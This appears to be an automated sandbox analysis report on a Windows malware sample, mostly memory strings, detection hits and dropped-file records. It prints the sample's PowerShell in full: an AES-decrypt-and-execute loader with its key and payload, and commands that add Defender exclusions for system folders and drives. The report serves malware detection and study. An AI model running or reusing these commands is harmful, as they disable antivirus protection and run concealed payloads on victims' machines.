Source: svchost.exe, 00000009.00000003.1368418759.000001DEFEA32000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net
Source: svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000009.00000003.1368338734.000001DEFEA4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000003.1368418759.000001DEFEA32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368338734.000001DEFEA4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000002.1368882682.000001DEFEA27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: svchost.exe, 0000002E.00000002.2329342995.00000000660F4000.00000008.00000001.01000000.0000001D.sdmp, usvc.dat.31.dr String found in binary or memory: https://www.gnu.org/licenses/
Source: svchost.exe String found in binary or memory: https://www.openssl.org/
Source: svchost.exe, 0000002E.00000002.2388271854.00007FFA2CEE1000.00000002.00000001.01000000.00000018.sdmp, svchost.exe, 0000002E.00000002.2383458007.00007FFA244AE000.00000002.00000001.01000000.0000001B.sdmp, libcrypto-3-x64.dll.31.dr, libssl-3-x64.dll.31.dr, usvc.dat.31.dr String found in binary or memory: https://www.openssl.org/H
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.17:49726 version: TLS 1.2
Creates a window with clipboard capturing capabilities
Source: C:\Program Files\7-Zip\7zFM.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA330F1180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, 51_2_00007FFA330F1180

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 3740, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Found suspicious ZIP file
Source: x447823.zip.16.dr Zip Entry: x447823.vbs
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
Contains functionality to communicate with device drivers
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CF15730: CreateDirectoryA,CreateFileA,GetLastError,strchr,strchr,MultiByteToWideChar,DeviceIoControl,GetLastError,_errno,GetLastError,FormatMessageA,libintl_gettext,__acrt_iob_func,LocalFree,CloseHandle,RemoveDirectoryA,_errno,CloseHandle, 46_2_00007FFA2CF15730
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Source: C:\Windows\System32\cmd.exe File created: C:\Windows Jump to behavior
Source: C:\Windows\System32\cmd.exe File created: C:\Windows \System32 Jump to behavior
Source: C:\Windows\System32\cmd.exe File created: C:\Windows \System32\010101 Jump to behavior
Source: C:\Windows\System32\xcopy.exe File created: C:\Windows \System32\printui.exe
Source: C:\Windows\System32\xcopy.exe File created: C:\Windows \System32\x249569.dat
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\usvc.dat
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\winsvcf
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\winsvcf\winlogsvc
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcurl.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\zlib1.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcrypto-3-x64.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libiconv-2.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libintl-9.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libssl-3-x64.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libwinpthread-1.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\console_zero.exe
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libpq.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\ucrtbased.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\vcruntime140d.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\x338625.dat
Deletes files inside the Windows folder
Source: C:\Windows\System32\cmd.exe File deleted: C:\Windows \System32\010101
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5141348 34_2_00007FF9C5141348
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C51421DD 34_2_00007FF9C51421DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C550EF5A 34_2_00007FF9C550EF5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5507E55 34_2_00007FF9C5507E55
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5506DFB 34_2_00007FF9C5506DFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5500E65 34_2_00007FF9C5500E65
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C54FD659 34_2_00007FF9C54FD659
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C54F967E 34_2_00007FF9C54F967E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C550751D 34_2_00007FF9C550751D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C550CD7D 34_2_00007FF9C550CD7D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C54F2592 34_2_00007FF9C54F2592
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C54F103E 34_2_00007FF9C54F103E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C550E038 34_2_00007FF9C550E038
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C54FEFF4 34_2_00007FF9C54FEFF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C550C80D 34_2_00007FF9C550C80D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C550A7ED 34_2_00007FF9C550A7ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C54F806D 34_2_00007FF9C54F806D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C550C05D 34_2_00007FF9C550C05D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C54FD887 34_2_00007FF9C54FD887
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C54F2880 34_2_00007FF9C54F2880
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C550B747 34_2_00007FF9C550B747
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C550E710 34_2_00007FF9C550E710
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C550EFA9 34_2_00007FF9C550EFA9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C550B2BB 34_2_00007FF9C550B2BB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5507ABB 34_2_00007FF9C5507ABB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C54F127F 34_2_00007FF9C54F127F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5506A7B 34_2_00007FF9C5506A7B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C54F9122 34_2_00007FF9C54F9122
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5500145 34_2_00007FF9C5500145
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C55070DD 34_2_00007FF9C55070DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C550A15D 34_2_00007FF9C550A15D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5501179 34_2_00007FF9C5501179
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C54F8438 34_2_00007FF9C54F8438
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C550D42B 34_2_00007FF9C550D42B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C54FECC5 34_2_00007FF9C54FECC5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C54F1CBD 34_2_00007FF9C54F1CBD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C54FA4B9 34_2_00007FF9C54FA4B9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C550A48D 34_2_00007FF9C550A48D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5500459 34_2_00007FF9C5500459
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C54FD494 34_2_00007FF9C54FD494
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C550845D 34_2_00007FF9C550845D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C550C355 34_2_00007FF9C550C355
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C55072FD 34_2_00007FF9C55072FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C550538B 34_2_00007FF9C550538B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C58B26F3 34_2_00007FF9C58B26F3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C58BB66C 34_2_00007FF9C58BB66C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C58B8270 34_2_00007FF9C58B8270
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C58B1A70 34_2_00007FF9C58B1A70
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C58B1A55 34_2_00007FF9C58B1A55
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5B81249 34_2_00007FF9C5B81249
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5B711B4 34_2_00007FF9C5B711B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5B73455 34_2_00007FF9C5B73455
Source: C:\Windows\System32\svchost.exe Code function: 46_2_649504E4 46_2_649504E4
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6600A230 46_2_6600A230
Source: C:\Windows\System32\svchost.exe Code function: 46_2_66010760 46_2_66010760
Source: C:\Windows\System32\svchost.exe Code function: 46_2_66009810 46_2_66009810
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6600BC90 46_2_6600BC90
Source: C:\Windows\System32\svchost.exe Code function: 46_2_660050A0 46_2_660050A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_66019CB0 46_2_66019CB0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6600ACD0 46_2_6600ACD0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_66004CE0 46_2_66004CE0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6600DD20 46_2_6600DD20
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6600CD60 46_2_6600CD60
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6600E580 46_2_6600E580
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6600D5A0 46_2_6600D5A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_660121B0 46_2_660121B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6828A0B0 46_2_6828A0B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6828C220 46_2_6828C220
Source: C:\Windows\System32\svchost.exe Code function: 46_2_68281C10 46_2_68281C10
Source: C:\Windows\System32\svchost.exe Code function: 46_2_68283500 46_2_68283500
Source: C:\Windows\System32\svchost.exe Code function: 46_2_682926C1 46_2_682926C1
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE84CD0 46_2_00007FFA2CE84CD0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE94CC0 46_2_00007FFA2CE94CC0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE30EB0 46_2_00007FFA2CE30EB0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6EDC0 46_2_00007FFA2CE6EDC0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE82FA0 46_2_00007FFA2CE82FA0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE970A0 46_2_00007FFA2CE970A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE4CA90 46_2_00007FFA2CE4CA90
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA69E0 46_2_00007FFA2CEA69E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE78B60 46_2_00007FFA2CE78B60
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8CB30 46_2_00007FFA2CE8CB30
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE80590 46_2_00007FFA2CE80590
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE90550 46_2_00007FFA2CE90550
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8E4E0 46_2_00007FFA2CE8E4E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8A6B0 46_2_00007FFA2CE8A6B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3C610 46_2_00007FFA2CE3C610
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6C700 46_2_00007FFA2CE6C700
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7E0F0 46_2_00007FFA2CE7E0F0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEAC280 46_2_00007FFA2CEAC280
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE5C240 46_2_00007FFA2CE5C240
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6C210 46_2_00007FFA2CE6C210
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE22210 46_2_00007FFA2CE22210
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE68350 46_2_00007FFA2CE68350
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE422E0 46_2_00007FFA2CE422E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8A2E0 46_2_00007FFA2CE8A2E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA1D30 46_2_00007FFA2CEA1D30
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE99CC1 46_2_00007FFA2CE99CC1
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE4DEA0 46_2_00007FFA2CE4DEA0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE95E80 46_2_00007FFA2CE95E80
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2C030 46_2_00007FFA2CE2C030
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE52020 46_2_00007FFA2CE52020
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE87FE0 46_2_00007FFA2CE87FE0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3B950 46_2_00007FFA2CE3B950
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE938C0 46_2_00007FFA2CE938C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2FBB0 46_2_00007FFA2CE2FBB0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7DAD0 46_2_00007FFA2CE7DAD0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE23C40 46_2_00007FFA2CE23C40
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA9C40 46_2_00007FFA2CEA9C40
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE85C20 46_2_00007FFA2CE85C20
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE834C0 46_2_00007FFA2CE834C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE856E0 46_2_00007FFA2CE856E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE9985F 46_2_00007FFA2CE9985F
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3B830 46_2_00007FFA2CE3B830
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7F0F0 46_2_00007FFA2CE7F0F0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA92A0 46_2_00007FFA2CEA92A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7D260 46_2_00007FFA2CE7D260
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE25380 46_2_00007FFA2CE25380
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE81310 46_2_00007FFA2CE81310
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE432C0 46_2_00007FFA2CE432C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6F420 46_2_00007FFA2CE6F420
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE27400 46_2_00007FFA2CE27400
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CF08D70 46_2_00007FFA2CF08D70
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CF0E820 46_2_00007FFA2CF0E820
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CF108B0 46_2_00007FFA2CF108B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CF0DF00 46_2_00007FFA2CF0DF00
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CF0E8E0 46_2_00007FFA2CF0E8E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEF6AE0 46_2_00007FFA2CEF6AE0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CF03440 46_2_00007FFA2CF03440
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA4188516C 46_2_00007FFA4188516C
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417ED720 46_2_00007FFA417ED720
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417F0B90 46_2_00007FFA417F0B90
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417EBFA0 46_2_00007FFA417EBFA0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417CE240 46_2_00007FFA417CE240
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417D7210 46_2_00007FFA417D7210
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA4185014C 46_2_00007FFA4185014C
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA4181D160 46_2_00007FFA4181D160
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA418721B4 46_2_00007FFA418721B4
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA4186412C 46_2_00007FFA4186412C
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417F6130 46_2_00007FFA417F6130
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417C4480 46_2_00007FFA417C4480
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA418403C0 46_2_00007FFA418403C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417EA3E0 46_2_00007FFA417EA3E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA4182F380 46_2_00007FFA4182F380
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA418052E0 46_2_00007FFA418052E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41858684 46_2_00007FFA41858684
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417FF5F0 46_2_00007FFA417FF5F0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41870574 46_2_00007FFA41870574
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41876564 46_2_00007FFA41876564
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA418025B0 46_2_00007FFA418025B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417D5500 46_2_00007FFA417D5500
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41861514 46_2_00007FFA41861514
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417D6880 46_2_00007FFA417D6880
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417DF8B0 46_2_00007FFA417DF8B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA418497E0 46_2_00007FFA418497E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41874818 46_2_00007FFA41874818
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417FE810 46_2_00007FFA417FE810
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417C2510 46_2_00007FFA417C2510
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41861718 46_2_00007FFA41861718
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA4182F720 46_2_00007FFA4182F720
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41864728 46_2_00007FFA41864728
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41875A54 46_2_00007FFA41875A54
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41845A70 46_2_00007FFA41845A70
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417CDA90 46_2_00007FFA417CDA90
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA418779C0 46_2_00007FFA418779C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417CE9E0 46_2_00007FFA417CE9E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417C4A00 46_2_00007FFA417C4A00
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41861924 46_2_00007FFA41861924
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417C3BF0 46_2_00007FFA417C3BF0
